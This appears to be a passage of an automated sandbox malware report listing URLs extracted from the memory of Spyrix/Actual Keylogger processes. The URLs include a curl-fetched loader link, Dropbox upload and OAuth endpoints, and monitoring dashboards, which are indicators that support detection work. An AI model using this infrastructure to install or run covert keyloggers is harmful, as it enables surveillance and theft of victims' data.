Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.certum.pl0.
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rc.qzone.qq.com/qzonesoso/?search
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/l3.cer0
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: spkl.exe	String found in binary or memory: http://spyrix.com/manual.php
Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://user.qzone.qq.com
Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/search
Source: spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/searchecp
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.actualkeylogger.com/buynow.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html#registrate
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.html#registratehttp://www.spyrix.com/manual.php#registrateU
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: [space]= .exe, 00000012.00000003.2049227259.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2583732673.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.dk-soft.org/
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: spkl.exe, spkl.exe, 00000035.00000002.2971872040.0000000004541000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2923493069.0000000000863000.00000040.00000001.01000000.00000014.sdmp, spmm.exe, 00000049.00000002.2927093820.0000000002401000.00000004.00001000.00020000.00000000.sdmp, spmm.exe, 00000049.00000000.2712353086.0000000000401000.00000020.00000001.01000000.00000018.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: spkl.exe	String found in binary or memory: http://www.indyproject.org/Original
Source: [space]= .exe, 00000012.00000003.2050312910.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2049890416.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000000.2051232683.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jrsoftware.org/0
Source: [space]= .exe, 00000012.00000000.2048720751.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/my/mail
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ok.ru/dk?st.cmd=searchResult
Source: [space]= .exe, 00000012.00000003.2050312910.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2049890416.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000000.2051232683.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com
Source: [space]= .exe, 00000012.00000003.2049227259.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2583732673.000000000226E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.0000000003240000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2564952480.00000000033F2000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/
Source: spkl.exe	String found in binary or memory: http://www.spyrix.com/manual.php#registrate
Source: spkl.exe, 00000035.00000003.2555270269.0000000004591000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2933829318.00000000009EA000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.spyrix.com/osticket/upload/open.php
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/pro_upgrade.htm?lic=
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/purchase.php
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/purchase.php?prg=sfksT
Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.0000000003325000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/terms-of-use.php)
Source: spkl.exe, 00000035.00000002.2933829318.0000000000915000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2555270269.00000000044CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.net/ibann
Source: spmm.exe, 00000049.00000002.2933603413.0000000061E9E000.00000008.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/commit_chunked_upload
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/dropbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/sandbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/dropbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/sandbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token
Source: spkl.exe	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?SV
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/dropbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/sandbox
Source: [space]= .tmp, 00000013.00000003.2562658084.0000000003303000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cdndownload.net/proxy/list.json
Source: curl.exe, 0000000C.00000002.1788586012.0000000003280000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788609338.0000000003295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: curl.exe, 0000000C.00000003.1788444030.0000000003294000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788609338.0000000003295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk%
Source: curl.exe, 0000000C.00000003.1788444030.0000000003294000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788609338.0000000003295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkE
Source: curl.exe, 0000000C.00000002.1788586012.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkG
Source: curl.exe, 0000000C.00000003.1788444030.0000000003294000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788609338.0000000003295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkM
Source: cmd.exe, 00000008.00000003.1751133117.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788586012.0000000003280000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788536775.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
Source: curl.exe, 0000000C.00000002.1788647034.00000000032C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkX0
Source: cmd.exe, 00000008.00000003.1751133117.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788586012.0000000003280000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788536775.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
Source: spkl.exe, 00000035.00000002.2984780387.0000000007D10000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2870771422.0000000007D8D000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2984780387.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2871310648.0000000007D84000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2958710472.0000000001910000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2989667203.0000000008736000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: qrl.exe, 00000043.00000002.2713886542.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2765239399.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2756141897.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767899122.000000000106A000.00000008.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/P
Source: spkl.exe, 00000035.00000002.2984780387.0000000007D59000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2713886542.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2765239399.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2756141897.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767899122.000000000106A000.00000008.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
Source: qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.htmlcurl
Source: qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com
Source: spkl.exe	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-program
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-programspsMapspsJSON
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.clevercontrol.com/account/user-hash-gen
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com
Source: spkl.exe, 00000035.00000002.2984780387.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2871310648.0000000007D84000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2958710472.0000000001910000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2984780387.0000000007D8C000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2989667203.0000000008736000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2984780387.0000000007D9B000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/.spyrix.com/
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/.spyrix.com/6s
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program
